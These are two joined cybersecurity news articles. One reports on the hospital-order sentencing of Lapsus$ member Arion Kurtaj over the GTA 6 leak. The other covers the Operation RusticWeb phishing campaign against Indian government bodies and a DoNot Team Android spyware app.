Arion Kurtaj, a 17-year-old from the United Kingdom, faced accusations of being part of the Lapsus$ gang, hacking industry giants, including Uber, Rockstar Games, Nvidia, BT, Samsung, and others.

In July 2023, **Hackread.com reported** that two UK teenagers, 17-year-old Arion Kurtaj and an unnamed 18-year-old hacker, were facing trial for computer misuse, blackmail, and fraud against BT Group Plc and Nvidia.

The duo was accused of stealing sensitive data and demanding ransom money. Now, one of the accused, Kurtaj, has been sentenced, but due to his autism, he has received an indefinite hospital order for **leaking clips** of Grand Theft Auto 6 (GTA 6), an upcoming game from Rockstar Games.

GTA images and videos plus internal software (Image: Waqas – Hackread.com)

Kurtaj was identified as a key member of the infamous **Lapsus$ cybercrime gang**, known for launching devastating cyberattacks against tech giants such as Uber, Nvidia, and Rockstar Games. The gang executed cyberattacks between August 2020 and September 2022, targeting telecoms, computer parts manufacturers, and gaming companies.

According to Rockstar Games’ testimony during the trial, the hack orchestrated by Lapsus$ cost them $5 million to recover from, contributing to the overall financial impact of nearly $10 million on the targeted companies.

**Reportedly**, Kurtaj had been violent while in custody, with dozens of reports of injury or property damage. Doctors deemed him unfit to stand trial due to his severe autism, so the jury at a Southwark crown court was asked to determine whether he committed the alleged acts without criminal intent.

Considering Kurtaj’s skills and inclination to commit cybercrime, the judge deemed him a high risk to public safety. Consequently, he will be held at a secure hospital for life unless doctors determine he is no longer a danger. A mental health assessment was conducted as part of the sentencing process. Shockingly, it was revealed during the hearing that Kurtaj continued hacking while on bail, targeting major entities like Nvidia and BT/EE even under police protection at a Travelodge hotel.

Reportedly, he breached Rockstar, the company behind GTA, using an Amazon Firestick, hotel TV, and mobile phone to hack its internal Slack messaging system. He stole 90 unreleased clips and threatened to release the source code if Rockstar didn’t contact him on Telegram within 24 hours. Kurtaj posted the clips and source code on a forum under the username TeaPotUberHacker. **He was rearrested** and detained until his trial.

Uber hacker ”TeaPotUberHacker” on GTA forums announcing GTA 6 hack and leaking its data (Image: Waqas – Hackread.com)

Contrary to reports, cybersecurity researcher Robert Graham asserts that claims of Kurtaj using just an Amazon Firestick to breach the gaming giant are inaccurate and exaggerated. Graham contends that the hacker employed his phone for this purpose.

“Specifically, he connected his phone to the TV and its Bluetooth keyboard, through the FireTV stick. This made things more convenient when accessing the Internet from his phone, but was by no means such things were essential,” tweeted Graham.

> Cybersecurity expert here: no.
> 
> The stories of teenage hacking are sensationalized.
> 
> As far as we can tell, he didn't hack into the company using a FireTV stick. He accessed the company using his phone.
> 
> Specifically, he connected his phone to the TV and its bluetooth keyboard,… https://t.co/N2a5w8U369
> 
> — Robᵉʳᵗ Graham 𝕏 (@ErrataRob) December 22, 2023

In a separate development, a 17-year-old member of the Lapsus$ gang was found guilty of two counts of fraud, two Computer Misuse Act offences, and one count of blackmail by Guildford Crown Court in Surrey. He was sentenced to a youth rehabilitation order, which includes 18 months of supervision, six months of rehabilitation, and three months of intensive supervision and surveillance.

The cases highlight the dangers young people can face online and the serious consequences it can have on their future, stated DCS Amanda Horsburgh, from the City of London police.

“Unfortunately, the digital world can also be tempting to young people for the wrong reasons,” Horsburgh added.

Hackread.com has followed UK law enforcement’s crackdown against the Lapsu$ gang members and those behind high-profile security breaches. In September 2022, Hackread reported the arrest of a 17-year-old teen from Oxfordshire by the City of London Police for their suspected link with Uber and Rockstar Games’ breaches.

****_RELATED ARTICLES_****

1.  Hackers remotely interrupting GTA Online PC Gameplay
2.  LAPSUS$ Hackers Leak Claim to Breach Microsoft and Okta
3.  Russian Hacker Exploits GTA 5 PC Mod to Install Crypto Miner
4.  Lapsus$ Hackers Stole T-Mobile’s Source Code, Systems Data
5.  Authorities seize properties of GTA V’s “Infamous” cheat developers
6.  Samsung confirms data breach as Lapsus$ hackers leak source code

GTA 6 Hacker from Lapsus$ Gang Sentenced to Hospital

Indian government entities and the defense sector have been targeted by a phishing campaign that's engineered to drop Rust-based malware for intelligence gathering.
The activity, first detected in October 2023, has been codenamed Operation RusticWeb by enterprise security firm SEQRITE.
"New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate

Indian government entities and the defense sector have been targeted by a phishing campaign that's engineered to drop Rust-based malware for intelligence gathering.

The activity, first detected in October 2023, has been codenamed **Operation RusticWeb** by enterprise security firm SEQRITE.

"New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate confidential documents to a web-based service engine, instead of a dedicated command-and-control (C2) server," security researcher Sathwik Ram Prakki said.

Tactical overlaps have been uncovered between the cluster and those widely tracked under the monikers Transparent Tribe and SideCopy, both of which are assessed to be linked to Pakistan.

SideCopy is also a suspected subordinate element within Transparent Tribe. Last month, SEQRITE detailed multiple campaigns undertaken by the threat actor targeting Indian government bodies to deliver numerous trojans such as AllaKore RAT, Ares RAT, and DRat.

UPCOMING WEBINAR

Beat AI-Powered Threats with Zero Trust - Webinar for Security Professionals

Traditional security measures won't cut it in today's world. It's time for Zero Trust Security. Secure your data like never before.

Join Now

Other recent attack chains documented by ThreatMon have employed decoy Microsoft PowerPoint files as well as specially crafted RAR archives susceptible to CVE-2023-38831 for malware delivery, enabling unbridled remote access and control.

"The SideCopy APT Group's infection chain involves multiple steps, each carefully orchestrated to ensure successful compromise," ThreatMon noted earlier this year.

The latest set of attacks commences with a phishing email, leveraging social engineering techniques to trick victims into interacting with malicious PDF files that drop Rust-based payloads for enumerating the file system in the background while displaying the decoy file to the victim.

Besides amassing files of interest, the malware is equipped to collect system information and transmit them to the C2 server but lacks the features of other advanced stealer malware available in the cybercrime underground.

A second infection chain identified by SEQRITE in December employs a similar multi-stage process but substitutes the Rust malware with a PowerShell script that takes care of the enumeration and exfiltration steps.

But in an interesting twist, the final-stage payload is launched via a Rust executable that goes by the name "Cisco AnyConnect Web Helper." The gathered information is ultimately uploaded to oshi\[.\]at domain, an anonymous public file-sharing engine called OshiUpload.

"Operation RusticWeb could be linked to an APT threat as it shares similarities with various Pakistan-linked groups," Ram Prakki said.

The disclosure comes nearly two months after Cyble uncovered a malicious Android app utilized by the DoNot Team targeting individuals in the Kashmir region of India.

The nation-state actor, also known by the names APT-C-35, Origami Elephant, and SECTOR02, is believed to be of Indian origin and has a history of utilizing Android malware to infiltrate devices belonging to people in Kashmir and Pakistan.

The variant examined by Cyble is a trojanized version of an open-source GitHub project called "QuranApp: Read and Explore" that comes fitted with a wide range of spyware features to record audio and VoIP calls, capture screenshots, gather data from various apps, download additional APK files, and track the victim's location.

"The DoNot group's relentless efforts to refine their tools and techniques underscore the ongoing threat they pose, particularly in their targeting of individuals in the sensitive Kashmir region of India," Cyble said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#git